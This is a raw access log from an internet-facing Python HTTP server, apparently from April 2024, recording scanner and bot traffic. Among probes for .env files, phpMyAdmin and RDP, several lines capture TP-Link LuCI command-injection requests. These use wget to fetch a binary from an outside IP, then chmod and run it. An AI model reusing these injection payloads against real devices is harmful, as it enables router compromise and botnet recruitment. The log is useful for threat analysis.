1\x8cnaU:\x81ï©[Ý\x81ûç\x00$\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩À$À(À#À'\x00\x9f\x00\x9e\x00k\x00g\x00ÿ\x01\x00\x00\x8b\x00\x0b\x00\x04\x03\x00\x01\x02\x00" 400 - 185.16.38.111 - - [26/Apr/2024 15:02:00] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [26/Apr/2024 15:04:41] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [26/Apr/2024 15:38:16] "GET / HTTP/1.1" 200 - 193.106.29.125 - - [26/Apr/2024 16:32:13] "GET / HTTP/1.0" 200 - 59.178.213.144 - - [26/Apr/2024 16:33:32] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [26/Apr/2024 17:40:10] code 404, message File not found 179.43.190.218 - - [26/Apr/2024 17:40:10] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 106.75.92.88 - - [26/Apr/2024 17:40:59] "GET / HTTP/1.1" 200 - 65.49.1.31 - - [26/Apr/2024 17:57:04] "GET / HTTP/1.1" 200 - 65.49.1.25 - - [26/Apr/2024 17:59:22] code 404, message File not found 65.49.1.25 - - [26/Apr/2024 17:59:22] "GET /favicon.ico HTTP/1.1" 404 - 65.49.1.33 - - [26/Apr/2024 18:00:05] code 404, message File not found 65.49.1.33 - - [26/Apr/2024 18:00:05] "GET /geoserver/web/ HTTP/1.1" 404 - 185.224.128.43 - - [26/Apr/2024 18:00:31] "GET / HTTP/1.1" 200 - 185.16.38.111 - - [26/Apr/2024 18:26:08] "GET / HTTP/1.1" 200 - 171.8.155.104 - - [26/Apr/2024 18:34:30] "GET / HTTP/1.1" 200 - 198.235.24.198 - - [26/Apr/2024 19:29:12] code 400, message Bad request version ('À\\x13À') 198.235.24.198 - - [26/Apr/2024 19:29:12] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03 0å²Ó­s\x8f\x95Êrï»h´Ø\x8aÌ\x95¢¡Ö\x8aâÆ·A\x1910u¬ d3S+\x1e\x8ct]b·Ã\x84$ "\x84#\x03õ׳\x89öÇ>)\x8b\x9dUmdõ\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.198 - - [26/Apr/2024 19:29:12] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.198 - - [26/Apr/2024 19:29:12] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03ý°kÃsWÐÚ\x1c\x99¡y&\x08o«àü=pø¦\x170ö­\x90M8_{U\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 194.50.16.190 - - [26/Apr/2024 19:44:01] "GET / HTTP/1.1" 200 - 78.153.140.179 - - [26/Apr/2024 19:47:01] code 400, message Bad request version ('\\x00\\x9eÀ(À$À\\x14À') 78.153.140.179 - - [26/Apr/2024 19:47:01] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03\x19Ä8éQµG©sÛ©Ë\x1b¯\x91Çʲ\x99%¹\x81*\x8a\x10MÍd³à\x1cq\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 78.153.140.179 - - [26/Apr/2024 19:47:01] code 404, message File not found 78.153.140.179 - - [26/Apr/2024 19:47:01] "GET /.env HTTP/1.1" 404 - 185.16.38.111 - - [26/Apr/2024 21:04:29] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [26/Apr/2024 21:47:05] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [26/Apr/2024 22:12:30] "GET / HTTP/1.1" 200 - 103.56.17.252 - - [26/Apr/2024 22:41:04] "GET / HTTP/1.1" 200 - 103.56.17.252 - - [26/Apr/2024 22:41:05] code 404, message File not found 103.56.17.252 - - [26/Apr/2024 22:41:05] "GET /favicon.ico HTTP/1.1" 404 - 103.56.17.252 - - [26/Apr/2024 22:41:05] code 404, message File not found 103.56.17.252 - - [26/Apr/2024 22:41:05] "GET /favicon.ico HTTP/1.1" 404 - 103.56.17.252 - - [26/Apr/2024 22:41:05] code 404, message File not found 103.56.17.252 - - [26/Apr/2024 22:41:05] "GET /favicon.ico HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('167.94.138.59', 55028) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.138.59 - - [27/Apr/2024 00:13:25] "GET / HTTP/1.1" 200 - 167.94.138.59 - - [27/Apr/2024 00:13:30] "GET / HTTP/1.1" 200 - 167.94.138.59 - - [27/Apr/2024 00:13:31] code 505, message Invalid HTTP version (2.0) 167.94.138.59 - - [27/Apr/2024 00:13:31] "PRI * HTTP/2.0" 505 - 167.94.138.59 - - [27/Apr/2024 00:13:32] code 404, message File not found 167.94.138.59 - - [27/Apr/2024 00:13:32] "GET /favicon.ico HTTP/1.1" 404 - 167.94.138.51 - - [27/Apr/2024 00:32:30] "GET / HTTP/1.1" 200 - 167.94.138.51 - - [27/Apr/2024 00:32:31] code 505, message Invalid HTTP version (2.0) 167.94.138.51 - - [27/Apr/2024 00:32:31] "PRI * HTTP/2.0" 505 - 167.94.138.51 - - [27/Apr/2024 00:32:31] code 404, message File not found 167.94.138.51 - - [27/Apr/2024 00:32:31] "GET /favicon.ico HTTP/1.1" 404 - 46.174.191.28 - - [27/Apr/2024 01:08:12] "GET / HTTP/1.0" 200 - 84.54.51.37 - - [27/Apr/2024 01:15:45] code 404, message File not found 84.54.51.37 - - [27/Apr/2024 01:15:45] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 77.82.91.139 - - [27/Apr/2024 01:20:09] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [27/Apr/2024 02:18:21] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [27/Apr/2024 02:18:21] "CONNECT google.com:443 HTTP/1.1" 501 - 185.16.38.111 - - [27/Apr/2024 02:24:50] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [27/Apr/2024 03:17:31] "GET / HTTP/1.1" 200 - 148.153.45.238 - - [27/Apr/2024 03:18:33] code 404, message File not found 148.153.45.238 - - [27/Apr/2024 03:18:33] "GET /6nbV HTTP/1.1" 404 - 148.153.45.238 - - [27/Apr/2024 03:18:33] code 404, message File not found 148.153.45.238 - - [27/Apr/2024 03:18:33] "GET /L7iq HTTP/1.1" 404 - 148.153.45.238 - - [27/Apr/2024 03:18:33] code 404, message File not found 148.153.45.238 - - [27/Apr/2024 03:18:33] "GET /aab8 HTTP/1.1" 404 - 148.153.45.238 - - [27/Apr/2024 03:18:34] code 404, message File not found 148.153.45.238 - - [27/Apr/2024 03:18:34] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 - 148.153.45.238 - - [27/Apr/2024 03:18:34] code 404, message File not found 148.153.45.238 - - [27/Apr/2024 03:18:34] "GET /aab9 HTTP/1.1" 404 - 148.153.45.238 - - [27/Apr/2024 03:18:34] code 404, message File not found 148.153.45.238 - - [27/Apr/2024 03:18:34] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 - 113.120.58.36 - - [27/Apr/2024 03:20:25] "GET / HTTP/1.1" 200 - 211.139.7.3 - - [27/Apr/2024 03:20:42] "GET / HTTP/1.1" 200 - 118.212.123.138 - - [27/Apr/2024 03:20:43] code 404, message File not found 118.212.123.138 - - [27/Apr/2024 03:20:43] "GET /favicon.ico HTTP/1.1" 404 - 194.165.16.72 - - [27/Apr/2024 03:42:33] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.165.16.72 - - [27/Apr/2024 03:42:33] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 179.43.190.218 - - [27/Apr/2024 04:06:02] code 404, message File not found 179.43.190.218 - - [27/Apr/2024 04:06:02] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 109.205.213.198 - - [27/Apr/2024 04:16:09] "GET / HTTP/1.1" 200 - 119.162.73.95 - - [27/Apr/2024 04:17:10] code 404, message File not found 119.162.73.95 - - [27/Apr/2024 04:17:10] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - 146.19.24.28 - - [27/Apr/2024 04:25:59] "GET / HTTP/1.1" 200 - 103.245.236.120 - - [27/Apr/2024 04:29:00] code 404, message File not found 103.245.236.120 - - [27/Apr/2024 04:29:00] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 - 138.197.166.15 - - [27/Apr/2024 04:41:03] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [27/Apr/2024 04:46:53] "GET / HTTP/1.1" 200 - 106.75.126.108 - - [27/Apr/2024 06:44:39] "GET / HTTP/1.1" 200 - 106.75.126.108 - - [27/Apr/2024 06:45:21] "GET /start.sh HTTP/1.1" 200 - 106.75.126.108 - - [27/Apr/2024 06:45:39] "GET /updateDNS.sh HTTP/1.1" 200 - 198.235.24.120 - - [27/Apr/2024 07:37:30] "GET / HTTP/1.0" 200 - 109.205.213.198 - - [27/Apr/2024 07:56:02] "GET / HTTP/1.1" 200 - 78.153.140.177 - - [27/Apr/2024 08:15:36] code 404, message File not found 78.153.140.177 - - [27/Apr/2024 08:15:36] "GET /.env HTTP/1.1" 404 - 78.153.140.177 - - [27/Apr/2024 08:15:36] code 400, message Bad request version ('P\\x84\\x01\\x0fz\\x83\\x9b¬·+ÑU$@ý¯\\x8a¨6c¢«ã\\x15àá¤\\x91EªÀ÷\\x00b\\x13\\x02\\x13\\x03\\x13\\x01À,À0À+À/̨̩\\x00£\\x00\\x9f\\x00¢\\x00\\x9e̪À¯À\\xadÀ$À(À') 78.153.140.177 - - [27/Apr/2024 08:15:36] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03í§Î\x0b£÷\x84\x8a"\x8a\x81\x10#aàWÎ'WT\x94äJCÿÄÇîc\x8cÐâ P\x84\x01\x0fz\x83\x9b¬·+ÑU$@ý¯\x8a¨6c¢«ã\x15àá¤\x91EªÀ÷\x00b\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩\x00£\x00\x9f\x00¢\x00\x9e̪À¯À­À$À(À" 400 - 87.121.69.52 - - [27/Apr/2024 08:42:28] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [27/Apr/2024 08:42:28] "CONNECT google.com:443 HTTP/1.1" 501 - 106.75.126.72 - - [27/Apr/2024 08:45:05] "GET / HTTP/1.1" 200 - 106.75.126.72 - - [27/Apr/2024 08:45:09] "GET /start.sh HTTP/1.1" 200 - 106.75.126.72 - - [27/Apr/2024 08:45:19] "GET /updateDNS.sh HTTP/1.1" 200 - 185.216.71.4 - - [27/Apr/2024 08:53:25] code 404, message File not found 185.216.71.4 - - [27/Apr/2024 08:53:25] "GET http://ip-api.com/json/?fields=61439 HTTP/1.1" 404 - 185.216.71.4 - - [27/Apr/2024 08:53:26] code 400, message Bad request version ("\\x97\\x12g¤\\x8frú>\\x1aÝJ¿¹3#\\x13Õ`K5B\\x8eeÜ\\x00>\\x13\\x02\\x13\\x03\\x13\\x01À,À0\\x00\\x9f̨̩̪À+À/\\x00\\x9eÀ$À(\\x00kÀ#À'\\x00gÀ") 185.216.71.4 - - [27/Apr/2024 08:53:26] "\x16\x03\x01\x01)\x01\x00\x01%\x03\x03Ü®­~ò°\x91`\x8cq)a+L§\x95öv2\x8fO\x17z\x1c5´_¦ë\x13\x8a Ýe<¥¡s*\x0d\x97\x12g¤\x8frú>\x1aÝJ¿¹3#\x13Õ`K5B\x8eeÜ\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9f̨̩̪À+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ" 400 - 185.224.128.43 - - [27/Apr/2024 09:01:55] "GET / HTTP/1.1" 200 - 87.236.176.221 - - [27/Apr/2024 09:09:29] "GET / HTTP/1.1" 200 - 185.170.144.3 - - [27/Apr/2024 09:13:27] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.170.144.3 - - [27/Apr/2024 09:13:27] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 35.240.121.17 - - [27/Apr/2024 09:33:50] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [27/Apr/2024 09:46:22] code 404, message File not found 179.43.190.218 - - [27/Apr/2024 09:46:22] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.16.38.111 - - [27/Apr/2024 09:50:04] "GET / HTTP/1.1" 200 - 212.70.149.134 - - [27/Apr/2024 09:57:16] "GET / HTTP/1.0" 200 - 46.174.191.31 - - [27/Apr/2024 10:19:36] "GET / HTTP/1.0" 200 - 185.16.38.111 - - [27/Apr/2024 11:12:57] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [27/Apr/2024 11:17:40] "GET / HTTP/1.1" 200 - 84.54.51.37 - - [27/Apr/2024 11:27:12] code 404, message File not found 84.54.51.37 - - [27/Apr/2024 11:27:12] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:42] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:42] "GET http://203.219.129.101:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:43] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:43] "GET http://203.219.129.101:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:43] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:43] "GET http://203.219.129.101:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:44] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:44] "GET http://203.219.129.101:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:45] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:45] "GET http://203.219.129.101:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:45] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:45] "GET http://203.219.129.101:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:46] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:46] "GET http://203.219.129.101:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:46] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:46] "GET http://203.219.129.101:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:47] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:47] "GET http://203.219.129.101:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:48] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:48] "GET http://203.219.129.101:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:48] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:48] "GET http://203.219.129.101:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:49] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:49] "GET http://203.219.129.101:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:49] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:49] "GET http://203.219.129.101:80/pma/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:50] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:50] "GET http://203.219.129.101:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:51] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:51] "GET http://203.219.129.101:80/myadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:51] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:51] "GET http://203.219.129.101:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:52] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:52] "GET http://203.219.129.101:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:55] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:55] "GET http://203.219.129.101:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:56] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:56] "GET http://203.219.129.101:80/SQL/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:57] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:57] "GET http://203.219.129.101:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:57] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:57] "GET http://203.219.129.101:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:58] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:58] "GET http://203.219.129.101:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:58] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:58] "GET http://203.219.129.101:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:19:59] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:19:59] "GET http://203.219.129.101:80/admin/pma/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:00] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:00] "GET http://203.219.129.101:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:01] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:01] "GET http://203.219.129.101:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:02] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:02] "GET http://203.219.129.101:80/webadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:02] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:02] "GET http://203.219.129.101:80/admin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:04] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:04] "GET http://203.219.129.101:80/dbadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:05] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:05] "GET http://203.219.129.101:80/mysql/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:05] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:05] "GET http://203.219.129.101:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:06] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:06] "GET http://203.219.129.101:80/phpma/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:06] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:06] "GET http://203.219.129.101:80/sqlweb/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:07] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:07] "GET http://203.219.129.101:80/webdb/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:08] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:08] "GET http://203.219.129.101:80/websql/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:08] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:08] "GET http://203.219.129.101:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:09] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:09] "GET http://203.219.129.101:80/php/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:10] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:10] "GET http://203.219.129.101:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:10] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:10] "GET http://203.219.129.101:80/db/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:11] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:11] "GET http://203.219.129.101:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:12] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:12] "GET http://203.219.129.101:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:12] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:12] "GET http://203.219.129.101:80/phpmanager/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:13] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:13] "GET http://203.219.129.101:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:13] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:13] "GET http://203.219.129.101:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [27/Apr/2024 12:20:14] code 404, message File not found 8.140.23.141 - - [27/Apr/2024 12:20:14] "GET http://203.219.129.101:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 - 38.110.46.254 - - [27/Apr/2024 12:49:20] "GET / HTTP/1.1" 200 - 38.110.46.254 - - [27/Apr/2024 12:49:41] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [27/Apr/2024 12:51:02] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 103.245.236.120 - - [27/Apr/2024 12:54:05] code 404, message File not found 103.245.236.120 - - [27/Apr/2024 12:54:05] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('167.94.138.62', 51360) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.138.62 - - [27/Apr/2024 13:06:00] "GET / HTTP/1.1" 200 - 167.94.138.62 - - [27/Apr/2024 13:06:07] "GET / HTTP/1.1" 200 - 167.94.138.62 - - [27/Apr/2024 13:06:08] code 505, message Invalid HTTP version (2.0) 167.94.138.62 - - [27/Apr/2024 13:06:08] "PRI * HTTP/2.0" 505 - 167.94.138.62 - - [27/Apr/2024 13:06:10] code 404, message File not found 167.94.138.62 - - [27/Apr/2024 13:06:10] "GET /favicon.ico HTTP/1.1" 404 - 185.224.128.43 - - [27/Apr/2024 13:42:17] "GET / HTTP/1.1" 200 - 59.178.241.34 - - [27/Apr/2024 13:46:48] "GET / HTTP/1.1" 200 - 185.161.248.148 - - [27/Apr/2024 13:49:32] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.161.248.148 - - [27/Apr/2024 13:49:32] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 83.97.73.245 - - [27/Apr/2024 13:59:23] code 404, message File not found 83.97.73.245 - - [27/Apr/2024 13:59:23] "GET /actuator/gateway/routes HTTP/1.1" 404 - 87.121.69.52 - - [27/Apr/2024 14:07:25] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [27/Apr/2024 14:07:25] "CONNECT google.com:443 HTTP/1.1" 501 - 185.16.38.111 - - [27/Apr/2024 14:29:08] "GET / HTTP/1.1" 200 - 177.131.121.228 - - [27/Apr/2024 14:34:05] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [27/Apr/2024 14:43:16] code 404, message File not found 179.43.190.218 - - [27/Apr/2024 14:43:16] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('167.94.146.55', 51014) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.146.55 - - [27/Apr/2024 15:17:41] "GET / HTTP/1.1" 200 - 167.94.146.55 - - [27/Apr/2024 15:17:45] "GET / HTTP/1.1" 200 - 167.94.146.55 - - [27/Apr/2024 15:17:46] code 505, message Invalid HTTP version (2.0) 167.94.146.55 - - [27/Apr/2024 15:17:46] "PRI * HTTP/2.0" 505 - 167.94.146.55 - - [27/Apr/2024 15:17:46] code 404, message File not found 167.94.146.55 - - [27/Apr/2024 15:17:46] "GET /favicon.ico HTTP/1.1" 404 - 185.191.126.213 - - [27/Apr/2024 16:07:18] "GET / HTTP/1.1" 200 - 185.161.248.199 - - [27/Apr/2024 16:43:11] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.172.111.146', 32293) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread 